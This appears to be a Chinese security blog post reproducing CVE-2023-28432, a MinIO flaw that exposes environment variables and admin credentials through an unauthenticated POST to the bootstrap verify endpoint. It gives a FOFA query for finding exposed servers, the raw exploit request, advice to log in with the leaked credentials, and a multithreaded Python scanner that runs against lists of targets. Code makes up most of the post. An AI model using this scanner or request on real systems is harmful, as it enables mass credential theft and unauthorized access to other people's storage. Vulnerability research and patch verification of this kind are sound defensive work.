来自公众号: 小白嘿课
搜索该公众号可查阅详情，附有截图复现过程。
本文链接:https://mp.weixin.qq.com/s/SXAEQ3WSOSo_sqGTXN7S6Q
0x01 漏洞概述
漏洞编号:CVE-2023-28432 CNNVD-202303-1795
MinIO是美国MinIO公司的一款开源对象存储服务器，是一款高性能、分布式的对象存储系统。它是一款软件产品，可以100%地运行在标准硬件上，即X86等低成本机器也能够很好地运行MinIO。MinIO中存在一处信息泄露漏洞：MinIO集群用于节点间信息交换的9000端口，在未经配置的情况下可通过发送特制HTTP请求进行未授权访问，进而导致MinIO对象存储的相关环境变量泄露，环境变量中包含密钥信息，泄露的信息中包含登录账号密码。
MinIO 存在信息泄露漏洞,该漏洞源于在集群部署中MinIO会返回所有环境变量,导致信息泄露。
0x02 影响版本
2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z（即 RELEASE.2023-03-20T20-16-18Z 及之后的版本不受影响）
0x03 漏洞复现
方式一:可以通过FOFA进行搜索,搜索的语法格式如下:
title="MinIO Browser"
漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上，可通过Burp Suite（BP）抓包分析。
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.126.128:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
（POST 请求体 data 为空，详细复现截图可查看原文链接）
利用泄露的用户名和密码登录系统。
# -*- coding: utf-8 -*-
from urllib.parse import urlsplit
import argparse
import requests
import sys
import re
import threading
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning
# Request headers attached to every probe (browser-like User-Agent).
headers: dict[str, str] = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
    "Content-Type": "application/x-www-form-urlencoded",
}

# The verify endpoint is probed with an empty POST body.
data: dict[str, str] = {}

# Base URLs (scheme://netloc) whose response matched; appended to by vultest().
vulurl: list[str] = []
#url合规检测执行
def urltest(url: str) -> None:
    """Normalise a user-supplied target into verify-endpoint URL(s) and probe each.

    Depending on which parts of the input urlsplit() recognises (scheme,
    netloc, path), one or two candidate URLs ending in
    ``/minio/bootstrap/v1/verify`` are built and passed to ``vultest``.
    Nothing is returned; ``vultest`` prints and records the results.
    """
    parsed_url = urlsplit(url)
    # NOTE(review): ``parsed_url.port`` is an int (or None), so comparing it
    # with the string "443" is always False and this branch is never taken.
    # Presumably meant to force https for port 443 -- TODO confirm intent.
    if parsed_url.port == "443" and parsed_url.netloc:
        url="https://"+parsed_url.netloc+"/minio/bootstrap/v1/verify"
        vultest(url)
    # Scheme and host given together with a path: keep scheme://host,
    # replace the supplied path with the verify endpoint.
    if parsed_url.netloc and parsed_url.path:
        url=parsed_url.scheme+"://"+parsed_url.netloc+"/minio/bootstrap/v1/verify"
        vultest(url)
    # Scheme and host, no path: append the endpoint to the URL as given.
    elif parsed_url.netloc:
        url=url+"/minio/bootstrap/v1/verify"
        vultest(url)
    # No scheme recognised (e.g. a bare "ip:port"): try both http and https.
    elif (not parsed_url.scheme) and parsed_url.path:
        url_1="http://"+url+"/minio/bootstrap/v1/verify"
        vultest(url_1)
        url_2="https://"+url+"/minio/bootstrap/v1/verify"
        vultest(url_2)
    # Anything else (a bare "hostname:port" may be parsed as scheme "hostname"
    # with no netloc -- depends on the Python version, TODO confirm): cut from
    # the first slash or backslash, substitute the endpoint path, and try both
    # schemes.  NOTE(review): if the input contains no slash at all, re.sub()
    # matches nothing and the endpoint path is not appended -- TODO confirm.
    else:
        modified_string = re.sub(r"[/\\].*", "/minio/bootstrap/v1/verify", url)
        url_1="http://"+modified_string
        vultest(url_1)
        url_2="https://"+modified_string
        vultest(url_2)
#漏洞检测
def _origin(url):
    """Return ``scheme://netloc`` of *url*; used for reporting and recording."""
    parts = urlsplit(url)
    return parts.scheme + "://" + parts.netloc


def vultest(url):
    """POST to *url* (a verify-endpoint URL) and report whether the response
    looks affected.

    A response is treated as a match when the status is 200 and the body
    contains the substring ``MinioEnv``; its origin is then appended to the
    module-level ``vulurl`` list.  Request-level failures (timeout,
    connection errors, ...) are reported and otherwise ignored.
    Nothing is returned.
    """
    try:
        # verify=False skips certificate validation (presumably for
        # self-signed lab certs); the 3 s timeout bounds each probe.
        response = requests.post(url, data=data, headers=headers, verify=False, timeout=3)
    except RequestException:
        print(_origin(url) + " [-]请求失败。")
        return

    origin = _origin(url)
    matched = response.status_code == 200 and "MinioEnv" in response.text
    if matched:
        vulurl.append(origin)
        print(origin + " [+]漏洞存在!!!")
    else:
        print(origin + " [-]漏洞不存在。")
#读取url或file
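def main() -> None:
    """Parse command-line arguments and probe one URL or every URL in a file.

    ``-u/--url`` probes a single target via ``urltest``; ``-f/--file`` reads
    one target per line, probes each in its own thread, waits for all of
    them, then prints every origin that ``vultest`` recorded in ``vulurl``.
    Exactly one of the two options is required (argparse enforces this).
    """
    # vultest() disables TLS verification; silence the per-request warning.
    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
    parser = argparse.ArgumentParser(description="读取命令行参数")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('-u', '--url', help='URL 参数')
    group.add_argument('-f', '--file', help='file 参数')
    args = parser.parse_args()

    if args.url:
        urltest(args.url)
    elif args.file:
        threads_queue = []
        # Explicit encoding so the target list decodes identically on every platform.
        with open(args.file, 'r', encoding='utf-8') as file:
            for line in file:
                line = line.strip()
                # Blank lines would otherwise reach urltest() as "" and
                # trigger meaningless probes; skip them.
                if not line:
                    continue
                read_thread = threading.Thread(target=urltest, args=(line,))
                threads_queue.append(read_thread)
                read_thread.start()
        for thread in threads_queue:
            thread.join()
        print("\n存在漏洞列表:")
        for url in vulurl:
            print(url+" [+]漏洞存在!!!")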
# Script entry point: only runs when executed directly, not when imported.
if __name__ == "__main__":
    main()